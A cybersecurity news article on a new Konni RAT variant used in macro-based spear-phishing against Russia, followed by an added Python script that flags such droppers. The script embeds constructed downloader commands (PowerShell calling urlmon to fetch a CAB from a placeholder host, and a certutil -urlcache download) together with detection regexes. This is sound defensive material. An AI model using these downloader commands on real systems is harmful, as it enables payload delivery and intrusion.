Malwarebytes: A new variant of Konni malware has been used to target Russia
A new variant of the Konni malware has been used to target Russia, according to Malwarebytes researchers, who discovered it. Konni was first observed in the wild in 2014 and has been tentatively linked to the North Korean APT group APT37. In late July 2021, the researchers detected an ongoing spear-phishing campaign that uses two Russian-language documents weaponized with the same malicious macro. One lure concerns trade and economic issues between Russia and the Korean Peninsula; the other concerns a meeting of the intergovernmental Russian-Mongolian commission. Both deliver the RAT.
The new Konni variant shared by the Malware Hunter JAMESWT
The differences between the new and the old campaigns according to the cybersecurity experts
According to the researchers, the new campaign differs from the earlier Konni cyber-espionage campaigns in several ways:
- The macros are different. Previously the actor stored its data in TextBoxes; now the payload is base64-encoded inside the document content;
- PowerShell and URLMON API calls are now used to download the CAB file, whereas the old campaign used certutil for the download;
- The new campaign uses two different UAC bypass techniques, chosen according to the victim's OS, whereas the old one relied only on token impersonation;
- The new variant of the Konni RAT is heavily obfuscated. Its configuration is now encrypted rather than base64-encoded, and it no longer uses FTP for exfiltration.
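The differences listed above are dropper tradecraft a defender can key on: a base64 blob sitting in macro text, certutil fetching a CAB (old campaign), and PowerShell reaching into URLMON to fetch it (new campaign). The script below is an added example, not code from Malwarebytes or from the report: it decodes long base64 runs found in macro source and tags process command lines that match those download and CAB-extraction patterns. The regexes, the sample macro, the command lines and the example.invalid URL are all constructed assumptions for illustration, not indicators from the campaign.

```python
"""Triage helpers for the macro-dropper behaviours described above.

Added example (not Malwarebytes' tooling): every sample and pattern here is
constructed; none is an indicator from the Konni report.
"""
import base64
import binascii
import re

# --- constructed samples ---------------------------------------------------

# Hypothetical stage-two command: PowerShell P/Invoking urlmon!URLDownloadToFile
# to fetch a .cab, the download style the article attributes to the new campaign.
# Domain and paths are placeholders, not indicators from the report.
EMBEDDED_PAYLOAD = (
    rb"powershell -nop -w hidden -c Add-Type -Namespace W -Name U -MemberDefinition "
    rb"'[DllImport(\"urlmon.dll\")]public static extern int URLDownloadToFile"
    rb"(IntPtr a,string b,string c,int d,IntPtr e);';"
    rb"[W.U]::URLDownloadToFile(0,'http://example.invalid/doc.cab','C:\Users\Public\doc.cab',0,0)"
)

# Macro source as it might be extracted from a document (constructed): the payload
# sits as a base64 string in the macro, mirroring "base64 encoded within the document".
B64_BLOB = base64.b64encode(EMBEDDED_PAYLOAD).decode()
CONSTRUCTED_MACRO = (
    "Sub AutoOpen()\n"
    "    Dim blob As String\n"
    f'    blob = "{B64_BLOB}"\n'
    "    Call RunDecoded(blob)\n"
    "End Sub\n"
)

# Process-creation command lines (constructed): the old certutil download path,
# the new PowerShell/URLMON path, CAB extraction, and one benign line.
CONSTRUCTED_PROCESS_LOGS = [
    r"certutil.exe -urlcache -split -f http://example.invalid/doc.cab C:\Users\Public\doc.cab",
    r'powershell.exe -nop -w hidden -c "Add-Type -MemberDefinition ... [DllImport(urlmon.dll)] ... URLDownloadToFile(...)"',
    r"expand.exe C:\Users\Public\doc.cab -F:* C:\Users\Public",
    r"notepad.exe C:\Users\me\notes.txt",
]

# --- detection logic (my patterns, an assumption, not signatures from the report) --

# A run of 64+ base64-alphabet characters plus optional padding.
B64_RE = re.compile(r"[A-Za-z0-9+/]{64,}={0,2}")

RULES = [
    ("certutil-download", re.compile(r"\bcertutil(\.exe)?\b.*-urlcache", re.I)),
    ("powershell-urlmon", re.compile(r"\bpowershell(\.exe)?\b.*urlmon", re.I)),
    ("cab-extraction", re.compile(r"\bexpand(\.exe)?\b.*\.cab\b", re.I)),
]


def find_base64_blobs(text):
    """Return the decoded bytes of every long base64 run that decodes cleanly."""
    blobs = []
    for m in B64_RE.finditer(text):
        try:
            blobs.append(base64.b64decode(m.group(0), validate=True))
        except (binascii.Error, ValueError):
            continue  # base64-looking but not base64 (e.g. a long identifier)
    return blobs


def classify_cmdline(cmdline):
    """Return the names of all RULES that match the command line."""
    return [name for name, rx in RULES if rx.search(cmdline)]


def triage_document(macro_text):
    """Decode embedded blobs and classify each one as if it were a command line."""
    findings = []
    for blob in find_base64_blobs(macro_text):
        decoded = blob.decode("utf-8", errors="replace")
        findings.append((decoded, classify_cmdline(decoded)))
    return findings


def triage_process_logs(lines):
    """Return (line, tags) for every command line that matched at least one rule."""
    hits = []
    for line in lines:
        tags = classify_cmdline(line)
        if tags:
            hits.append((line, tags))
    return hits


if __name__ == "__main__":
    for decoded, tags in triage_document(CONSTRUCTED_MACRO):
        print("macro blob:", tags, decoded[:60], "...")
    for line, tags in triage_process_logs(CONSTRUCTED_PROCESS_LOGS):
        print("process:", tags, line[:60])
```

The document triage decodes the blob and then runs the same command-line rules over the decoded text, so a macro carrying a base64-encoded PowerShell/URLMON downloader is flagged before anything executes; the process-log triage catches the same behaviour, and the older certutil variant, at runtime.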